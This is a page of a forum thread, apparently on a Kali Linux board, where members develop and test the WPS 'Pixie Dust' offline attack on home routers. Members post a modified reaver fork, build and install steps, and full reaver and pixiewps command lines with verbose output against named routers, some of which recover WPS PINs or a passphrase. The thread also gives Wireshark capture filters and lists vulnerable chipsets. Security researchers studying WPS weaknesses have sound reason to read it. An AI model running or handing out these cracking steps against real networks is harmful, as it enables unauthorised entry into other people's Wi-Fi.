Page 5 of 12 FirstFirst 123456789101112 LastLast
Results 201 to 250 of 583

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #201
    Join Date
    2015-Mar
    Posts
    127
    @MTeams

    Your internal reaver mod version feeds info into pixiewps automatically? (no more cut and paste?)

    If pixie attack works > key........if fail bruteforce 11,000 pins?

    Will release when -pkr added?
    Last edited by nuroo; 2015-04-12 at 14:33.

  2. #202
    Join Date
    2015-Apr
    Posts
    39
    Last edited by t6_x; 2015-05-16 at 11:59.

  3. #203
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by t6_x View Post
    Here is my contribution

    Reaver modified to make the pixiewps when testing a pin


    GitHub - Here

    https://github.com/t6x/reaver-wps-fork-t6x
    Thanks t6, just tested it.

    Code:
    reaver -i mon0 -b 40:70:09:DC:81:F0 -vv -S -K1
    Code:
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 40:**:**:**:BA:60
    [+] Switching mon0 to channel 1
    [+] Associated with 40:**:**:**:BA:60 (ESSID: TG1672G62)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: f2:f4:15:6c:59:39:dc:06:18:e9:c9:4f:e0:f3:8a:ad
    [P] PKE: dc:1e:5a:f6:6c:b8:98:9f:de:77:66:4e:41:fb:e7:11:b7:02:b7:7c:59:52:11:81:19:32:f0:f7:51:4e:27:8e:57:9a:de:10:f7:b8:5b:1e:fd:aa:6e:06:9e:e1:f1:96:e5:5a:c7:6f:e8:41:f5:ae:4b:11:53:65:59:6f:48:11:07:4c:93:80:c3:bb:ee:9a:e8:af:50:f6:58:fd:97:52:37:30:e9:5b:8a:74:41:54:17:da:7e:ea:5a:8a:9e:bc:f7:40:7e:8d:65:29:f2:6b:21:ee:27:ae:c3:60:42:db:2c:75:2d:72:5e:33:79:7c:3a:5e:55:90:69:a9:2b:92:4d:2f:9a:14:13:1c:f0:f8:92:c6:77:04:eb:03:9c:e6:1f:7b:ea:8b:2b:5e:18:9f:99:49:38:e3:9a:4b:60:09:41:94:83:51:47:1d:b7:d5:1b:4c:51:7a:92:be:77:da:b5:eb:a3:86:7a:dc:84:b9:99:fe:02:2c:5c:44:36:a3
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: c3:ee:01:ef:f3:63:86:49:7e:24:13:54:d1:f0:0d:ff:57:77:12:65:38:34:6f:10:4a:c8:14:95:57:6c:0e:2f
    [+] Sending M2 message
    [P] E-Hash1: 41:73:b9:eb:ea:74:0f:b1:fd:1a:d1:93:0f:df:37:8e:d7:fe:6c:ee:c2:ec:0f:0d:60:ac:91:4d:04:60:03:ee
    [P] E-Hash2: f7:42:2b:e7:13:6f:d0:00:d8:05:72:7d:b6:71:29:c4:10:1f:2f:01:0b:38:b2:9e:7d:99:3f:a7:86:d5:93:85
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: d5:84:7c:94:bb:1c:3e:45:a5:3f:60:b4:a1:2b:a4:9b
    [Pixie-Dust]   [*] PSK2: 45:68:18:4b:9b:28:45:c9:2a:c8:78:c3:b8:a9:b6:92
    [Pixie-Dust]   [+] WPS pin: 60919014
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    +1 for adding pkr to reaver output
    Awesome!!
    Last edited by nuroo; 2015-04-12 at 15:45.

  4. #204
    Join Date
    2015-Mar
    Posts
    127
    In example above reaver/pixie found pin. Nice.
    But it kept going. Continuing to try pins.

    Shouldnt it check the found pixie pin, to get the passphrase and then end?

  5. #205
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Thanks to Wiire and Espresso_Boy, the new modified reaver now prints the PKr for Realtek devices! http://www.mediafire.com/download/or4jj8m8jfek5b4

  6. #206
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    In example above reaver/pixie found pin. Nice.
    But it kept going. Continuing to try pins.

    Shouldnt it check the found pixie pin, to get the passphrase and then end?
    Yes, it is possible

    I'll make adjustments, for he did not continue with the test after running the pixie

    I will add an option to get the passphrase and close.

    Thanks for the tests and the contribution.

    Soon I commit

  7. #207
    Join Date
    2014-Feb
    Posts
    4
    root@kali:~# reaver -i mon0 -b 00:8E:F2:65:C4:74 -vv

    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [?] Restore previous session for 00:8E:F2:65:C4:74? [n/Y] n
    [+] Waiting for beacon from 00:8E:F2:65:C4:74
    [+] Switching mon0 to channel 12
    [+] Associated with 00:8E:F2:65:C4:74 (ESSID: virginmedia6972489)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 85:a2:64:d7:01:eb:1c:3f:9e:57:18:1e:8c:8d:cd:ec
    [P] PKE: 65:af:14:9c:e5:9b:2a:46:5f:a3:c4:e8:8e:ff:70:c4:35 :10:ab:8f:a0:ef:a5:53:d8:14:ee:87:e7:ea:20:b4:27:f 5:9d:b3:77:0f:c0:0b:3d:82:d7:c6:2d:65:84:62:bb:de: dc:9a:9e:f5:a2:6a:8d:94:f4:d2:28:6c:64:80:9c:b3:06 :fe:b5:4f:a0:8b:8d:12:54:97:16:0c:98:87:b4:52:0f:b 4:53:39:b8:72:f8:08:cd:9f:1e:4e:b9:d4:c5:7b:77:69: 84:17:e8:72:81:9c:b0:a7:af:86:92:6c:2f:38:03:7e:d9 :2a:16:31:51:b3:22:22:ed:6b:4c:76:f7:cf:a5:4e:68:9 7:5c:fc:16:2a:a7:13:0e:0d:c2:93:31:3f:08:a3:51:cb: 5c:68:b4:08:b5:90:89:c7:3c:a8:ef:20:dc:4d:b5:54:dc :03:d0:a2:80:ad:35:57:7a:e4:50:1c:a8:6a:eb:f2:d9:8 8:a0:7c:b3:a7:a8:8f:c7:26
    [P] WPS Manufacturer: Netgear
    [P] WPS Model Number: 123456
    [+] Received M1 message
    [P] PKR: b8:d9:19:ba:d9:af:20:61:11:4c:7b:6b:03:97:ce:fc:59 :bd:c5:f0:e0:d9:c8:ab:13:10:8e:ef:11:ff:b9:91:2a:6 a:7e:d9:61:6b:61:04:5b:56:ed:8e:d3:38:3a:94:bf:57: 5c:1b:2c:d0:1a:39:ec:53:26:43:62:8d:fc:62:bb:64:0b :b6:ed:4d:96:8d:8d:67:b9:a2:68:21:a5:de:6d:e1:65:2 d:7b:bd:25:95:26:f0:2d:ef:2d:9b:30:57:59:e0:5f:b9: b8:92:7a:03:16:84:3a:c0:cd:ee:56:d9:6f:ba:48:65:7d :9b:cf:72:d0:24:1a:96:c5:db:29:67:cc:4c:d2:58:0c:f 5:75:5c:04:d8:a0:25:05:5e:7a:c9:e9:0f:aa:7f:fc:cf: 42:58:d7:d0:5b:ba:d0:84:c1:f4:62:53:af:02:57:54:8c :f4:7f:26:4b:ca:b2:01:a9:16:f5:7b:38:53:76:c8:a9:9 a:04:6f:be:05:40:87:ac:3e
    [P] AuthKey: de:7d:cd:3d:d7:1c:90:ef:7c:bb:f8:01:90:6e:14:08:4a :77:4b:33:88:7b:41:05:85:a7:46:74:14:72:00:ae
    [+] Sending M2 message
    [P] E-Hash1: db:b9:20:c2:cf:a1:53:55:f2:d0:1a:79:ce:4c:f5:ba:7c :4f:dd:4d:f4:b3:35:ef:86:a3:93:47:00:c1:05:0b
    [P] E-Hash2: 97:f5:e9:a1:4e:cd:bf:8f:76:dd:8c:87:1a:30:24:76:8e :0c:56:c1:11:4e:77:89:33:45:c9:f6:66:b9:05:dc


    Working well now to see if it will find the pin, other attempts before said no.

  8. #208
    Join Date
    2014-Feb
    Posts
    4
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 7C:4C:A53:84:45
    [+] Associated with 7C:4C:A53:84:45 (ESSID: SKYA2FF7)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 04:57:06:96:9a:79:ba:40:c4:98:bb:bd:8f:44:82:84
    [P] PKE: 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37
    [P] WPS Manufacturer: Broadcom
    [P] WPS Model Number: 123456
    [+] Received M1 message
    [P] PKR: f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb
    [P] AuthKey: 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef
    [+] Sending M2 message
    [P] E-Hash1: 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f
    [P] E-Hash2: b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a


    root@kali:~# pixiewps -e 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37 -r f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb -s 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f -z b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a -a 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef

    [-] WPS pin not found!
    [*] Time taken: 0 s

  9. #209
    Join Date
    2015-Mar
    Posts
    127
    @soxrok2212

    Reaver reports:
    Manufacturer: MTT
    Model Number: 123456

    Wireshark reports:
    Manufacturer: MTT
    Model Name: MWG3401N

    Brand name possibly Zoom? Cant find any info on chipset used



    Pixiewps attack fails, however 1st try pin '12345670' gives passphrare!! Wow
    Last edited by nuroo; 2015-04-12 at 17:43.

  10. #210
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Probably a really old AP that the manufacturer never fixed.

  11. #211
    Join Date
    2015-Apr
    Posts
    15

    Post

    Vulnerable:

    WPS Manufacturer: D-Link
    WPS Model Number: DIR-615H1
    CHiP: Ralink RT3352

    E-Nonce: 60:d5:32:46:7f:2c:31:a8:e6:0b:db:5a:5e:06:ce:f8
    PKE:ac:21:5b:eb:8d:70:ac:53:81:c7:4d:aa:fc:88:90:3 d:8f:c7:5d:e8:fa:b1:d3:0f:d6:81:bf:d7:a1:0d:23:62: d3:07:77:d6:76:7b:5c:cc:18:f2:13:f3:1f:d2:64:86:87 :67:74:cf:38:db:e4:32:86:92:65:05:9a:8d:a3:eb:79:2 7:60:e6:13:74:d2:3b:92:42:37:e3:bb:3d:29:db:ff:78: 49:27:18:10:ef:bd:a4:ce:57:40:aa:7e:2d:bf:21:51:9f :91:f0:df:e3:d2:89:b5:9f:c1:b6:1c:5c:1e:d9:e3:73:d 4:38:3b:75:2e:e1:c2:63:55:a3:4d:e9:fe:c3:1f:e4:4d: ac:69:fe:9c:d3:37:7a:df:36:89:a3:61:00:92:d2:94:2e :b2:fd:82:84:b8:08:d3:64:ea:28:cd:26:5e:d6:62:a0:8 e:e5:df:f6:5f:2c:0d:28:c8:b6:48:c7:91:d2:e5:b7:d6: bd:c1:f4:7a:e6:be:e1:37:0b:96
    AuthKey: 93:94:ad:9a:fd:e1:e4:bc:6e:9b:77:ec:a8:52:de:cb:33 :3f:11:6d:d8:66:b2:d3:01:25:27:b9:9c:1f:91:ed
    E-Hash1: 86:31:65:59:bc:4c:4f:6c:55:53:6c:bd:24:82:11:4c:35 :4b:16:ed:b4:f9:b5:d5:b7:6a:d0:7f:be:bd:68:b8
    E-Hash2: 4b:f6:32:c3:55:2e:0b:e4:41:68:7b:03:10:74:2b:59:44 :6a:ee:27:d2:93:ca:d0:1a:cb:a1:da:2a:95:c6:9d

    NOT VULNERABLE:

    Modell: WNR1000v3 - Netgear
    Chip:Broadcom BCM5356A1


    E-Nonce: 5a:bc:44:d6:c7:96:9f:12:4e:e2:0a:c3:b6:b2:cd:53
    PKE:e5:4d:f8:60:b2:0c:a4:1e:94:55:46:bf:b5:e6:ba:7 2:0b:52:b5:37:ef:d9:e3:cd:a9:cd:e6:16:c6:b6:d9:d4: 41:47:05:59:aa:3c:b9:e0:2d:89:4b:d1:bd:97:a1:23:a4 :b7:98:48:2b:6e:dd:a1:b2:0c:28:d1:2c:a5:1c:6a:c7:2 6:e2:4d:18:f0:28:2d:1b:35:85:a0:01:1d:2f:1c:09:f6: b0:03:ee:c6:86:ff:dd:8d:84:f1:22:1d:de:2a:ff:9e:b3 :70:95:09:75:85:4a:1a:8a:41:57:7b:8e:e2:60:79:4f:9 1:cc:a2:55:12:73:a5:6c:e3:c5:08:fc:81:9a:1f:18:48: 25:69:f6:d6:6e:d2:1b:c3:d2:7b:87:c1:ee:ab:e6:e3:48 :eb:ed:8c:4f:1a:d1:60:27:b7:88:ed:96:5c:47:5f:b5:a 4:d3:78:0b:20:f7:5b:1e:cf:c0:a0:03:e4:49:f1:57:df: f9:b9:42:85:a0:51:dd:bc:cf:bd
    PKR:d8:8d:2f:fe:ca:6a:e6:db:c8:ac:7d:9c:5c:f8:36:6 b:7c:40:d2:56:91:0c:5d:d8:e4:f1:a8:2b:7f:c1:10:98: bf:a2:e3:df:02:a3:86:bb:be:10:a7:00:62:43:41:74:db :15:40:b5:18:42:de:92:e3:15:02:40:63:f2:fa:43:3d:e d:8c:78:e5:bf:40:37:1f:72:78:3a:73:c8:1f:93:9c:13: 18:a4:22:a6:8f:66:7d:c2:43:12:94:6f:92:a4:42:19:b2 :0d:21:b4:23:7b:75:75:f2:99:13:d4:09:76:fb:a7:23:9 3:1b:82:93:91:f6:cf:92:af:15:36:3c:a5:c4:5e:65:95: 10:52:54:dc:74:7b:b9:74:2d:fa:9e:6f:fb:c9:e6:87:a7 :ee:47:31:dc:ae:93:ba:6d:15:13:c9:51:7f:de:8f:f7:c 7:c3:09:86:3d:6b:cd:5e:3a:7d:a7:af:fb:39:82:10:12: 0c:1c:23:f7:16:6b:fe:6c:86:fc
    AuthKey: 5a:bf:8b:43:be:0d:e2:12:0d:48:a5:a4:95:7a:e5:31:1d :6a:75:0e:49:7e:6e:fd:18:07:96:c3:7d:21:f8:1e
    E-Hash1: 2a:1f:0d:4e:de:29:61:01:a0:86:45:be:34:71:ae:15:3c :58:21:e1:34:77:9b:f7:89:ed:48:07:b8:ee:9e:ac
    E-Hash2: 44:31:63:0f:9c:5e:e7:5b:bb:a7:1b:c2:b7:14:35:93:16 :fe:e7:0e:0e:33:85:c3:08:9f:24:a6:8c:dd:68:c7

    btw @soxrok2212: i forgot two digits in the hitron-no. correct is cve30360, not cve360]
    @all:
    is there any way, to calculate the auth-key from an existing .pcap with some bash/shell-code ? i like to extract the necessary info with tshark from capture-file (for PKR : tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with some bash-script.
    thanks & i forgot at my first post : great work !

  12. #212
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    In example above reaver/pixie found pin. Nice.
    But it kept going. Continuing to try pins.

    Shouldnt it check the found pixie pin, to get the passphrase and then end?
    I gave commit in a new version on github, but I could not get into the forum to post

    Whenever you need to make modifications and further improvements just stay tuned on github.

    This week I will post a new tool





    Apparently someone was attacking this my account to stop me from logging in this forum, I do not know what the reason for this, I tried to create another account, but also began to be attacked also

    I told the admin and they are already looking for the User responsible for this (Someone behind this proxy (167.114.0.xxx) )
    Last edited by t6_x; 2015-04-13 at 04:25.

  13. #213
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by t6_x View Post
    I gave commit in a new version on github, but I could not get into the forum to post

    Whenever you need to make modifications and further improvements just stay tuned on github.

    This week I will post a new tool





    Apparently someone was attacking this my account to stop me from logging in this forum, I do not know what the reason for this, I tried to create another account, but also began to be attacked also

    I told the admin and they are already looking for the User responsible for this (Someone behind this proxy (167.114.0.xxx) )
    wow t6, someone is a hater. Sry to hear you where being blocked. Wish I saw this post last night, I'm anxious to try new version reaver, but time for work. I will try it lunch time and report but. Excellent work !

  14. #214
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by someone_else View Post
    [B]
    @all:
    is there any way, to calculate the auth-key from an existing .pcap with some bash/shell-code ? i like to extract the necessary info with tshark from capture-file (for PKR : tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with some bash-script.
    thanks & i forgot at my first post : great work !
    Yeah its pretty simple but we haven't done it yet :P The drawback is you need to use small DH Keys in reaver to do it manually... and small DH keys don't work for Realtek:P Anyways, all you have to do is make the KDK, or Key Derivation Key:
    Code:
    KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)
    And then this gives you the AuthKey, KeyWrapKey and the EMSK:
    Code:
    kdf(key, personalization_string, total_key_bits) : result := “”
    iterations = (total_key_bits + prf_digest_size – 1)/prf_digest_size for i = 1 to iterations do
    result := result || prf(key, i || personalization_string || total_key_bits) return 1st total_key_bits of result and destroy any bits left over
    I'm not a coder so I can't do it but I'm sure someone else can.
    Last edited by soxrok2212; 2015-04-13 at 22:33.

  15. #215
    Join Date
    2015-Mar
    Posts
    127
    Belkin International
    F9K1002

    wikidevi 5 versions, different chipsets.

    pixiewps attack failed though, didnt catch version number with wireshack however

  16. #216
    Join Date
    2015-Apr
    Posts
    1
    Hi. thanks for this great information. Keep it up :-) . I tried to do it with pixiewps master but I didn't find the prk key and I added the -S but it didn't work. so, I tried the Pixiescript v2.1 and I got this : thanks
    REAVER TRABAJANDO CON BSSID 18:17:25:2B:E3:50, ESSID TNCAP2BE350 ESPERA 50 s ...
    EXTRAYENDO DATOS ...
    PKr : 00814f6ea4c9ab9d5d80106f6b8e314768ae728b4214c4698a 02eb9320f41e53f1054e6e137f64b64fec379fed2ce57c04af 39e51ff450908c74df7e6d7df0ec1430dca9841ec83b2e318c 78d8835a8b03c6321af1a168cd2a6383fa6458cce341a45e85 fbad444291e255d1c3204c12df3c8373061b6183f55c8ff458 f68f433334c1c0424fd95756efff233d8087a1d92aa64e92bb 3470ac1625c5308dc1af5839e58a42f35336e3f74a4b18806c f6cc6f054a9700fee1d8a507ce413dc07a
    PKe : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b
    EHASH1 : 316321fbd0c01cd758a89284fdc4c40bcbbe8f4be95a9d8f2b 22c6504a8d4e70
    EHASH2 : c680832b3a6e8afc47ef64147757cfb5d66ad977ea4cfc1dd6 d004563e1f2629
    AuthKey: 89299deee5f7a96ff56751a1628d9b9fdcad677af68ceb015d 5249bd7aac13ad
    Enrollee Nonce: 6e6e281312d0aa2679a8909435fd7d6f

    DATOS AP
    ========
    BSSID: : 18:17:25:2B:E3:50
    ESSID: : TNCAP2BE350
    Fabricante : Technicolor
    Nombre del dispositivo : Router
    Version OS : 268435456
    Modelo : Technicolor TD5
    Numero de modelo : Technicolor TD5

    PROBANDO CON PIXIEWPS 1.0 by wiire

    [-] WPS pin not found!
    [*] Time taken: 1 s

  17. #217
    Join Date
    2014-Nov
    Posts
    7
    Quote Originally Posted by simo1 View Post
    I tried the Pixiescript v2.1 and ...
    Pixiescript v2.4 is out.

  18. #218
    Join Date
    2015-Mar
    Posts
    19
    If you have the wps pin already through another method
    how can you find out the pass-phrase ?

  19. #219
    Join Date
    2014-Oct
    Posts
    2
    Really interested but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
    It needs reaver and what must I do to install?
    Thank you

  20. #220
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by saturn95 View Post
    Really interested but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
    It needs reaver and what must I do to install?
    Thank you
    Build Reaver

    cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install <<<----- will remove old version

  21. #221
    Join Date
    2014-Oct
    Posts
    2
    Quote Originally Posted by nuroo View Post
    Build Reaver

    cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install <<<----- will remove old version
    Thank you for responding

    I am now trying to figure how to use Wireshark to find M1 and M2 data.

    Thank you

  22. #222
    Join Date
    2015-Apr
    Posts
    28
    Great!

    Vulnerable ralink chipsets ...
    İnvulnerable realtek chipsets.

    Example... RTL8671 EV 2006-27-07 realtek chipsets are invulnerable...


    some modems using modem serial number for wps pin..

    Example . Air -rities modems...

  23. #223
    Join Date
    2015-Mar
    Posts
    141
    Use the wireshark filter "eapol.type == 0" and they are much easier to find.

  24. #224
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by aanarchyy View Post
    Use the wireshark filter "eapol.type == 0" and they are much easier to find.
    Is that a display filter correct?
    Is there a similar capture filter so file size not so big?

  25. #225
    Join Date
    2015-Mar
    Posts
    127
    Googled my own question.
    Display filter for Ethernet type EAPOL.
    "eapol.type == 0" or just "eapol"

    Capture filter for Ethernet type EAPOL - only saves eapols to hard drive during a capture session, much smaller file size.
    "ether proto 0x888e"

    enter without quotes.
    Last edited by nuroo; 2015-04-16 at 00:39.

  26. #226
    Join Date
    2015-Apr
    Posts
    4
    Hello Everyone !

    I want first to congratulate you about the great steps you did through this Pixie Dust Exploit.

    Also, I have noticed that today, on the WPS Pixie Dust Database , the router Technicolor TD5130 is being said as Vulnerable.

    However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

    So I want to know who could perform this exploit, and how (with full description if possible) ?

    There is also a TD5130 v3 that I'd love to test it on and share with you all.

    Thank You !

  27. #227
    Join Date
    2015-Apr
    Posts
    39
    It would be interesting you put the output of reaver.

    So we can see what chipset is and other information

  28. #228
    Join Date
    2013-Mar
    Posts
    3

    More for the database

    Hi All

    A couple more for the database

    Technicolor TG-797N v3
    Not Vulneruable

    Code:
       
    
    XX:XX:XX:XX:XX:XX| 6|-70|1.0|No |Telstra9F72A5| Technicolor| 797n v3
    
    OUI: 00-10-18 (Broadcom)
    
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 41:59:b6:83:3c:ce:53:58:e8:55:5d:b2:2c:b2:87:e7
    [P] PKE: 1c:8d:16:a1:5f:08:c2:f0:07:67:b3:24:c9:26:73:c2:ff:b5:c0:3b:39:96:fd:38:b1:d6:de:b7:81:15:63:cb:43:af:f8:21:4f:1d:47:3b:d8:71:e8:17:f6:49:f6:00:31:1c:95:ed:df:76:77:63:48:2b:82:95:e2:b0:bc:c4:41:2c:b5:2b:95:a6:3d:65:3f:3b:11:5d:81:92:2a:9b:65:a2:61:86:39:c7:d0:e0:3d:4c:c9:84:5c:78:b7:87:57:e9:9f:b1:46:97:ca:e0:b6:d2:c7:30:97:7c:a6:36:d6:97:39:fc:93:be:b8:c6:dd:d6:cb:59:b3:b5:e5:0a:94:0b:4a:0c:a8:15:ae:8d:95:dc:f0:95:63:5d:57:2d:34:d6:1d:b9:9e:3e:77:d5:be:c1:1f:a3:3d:55:b8:2b:6d:02:60:a0:a6:44:89:78:e4:a8:a4:56:f8:ee:5b:cb:5f:97:2e:62:a3:0d:21:e3:6a:75:ef:40:d0:db:39:4f
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: 797n v3
    [P] WPS Model Serial Number: 1426SARZR
    [+] Received M1 message
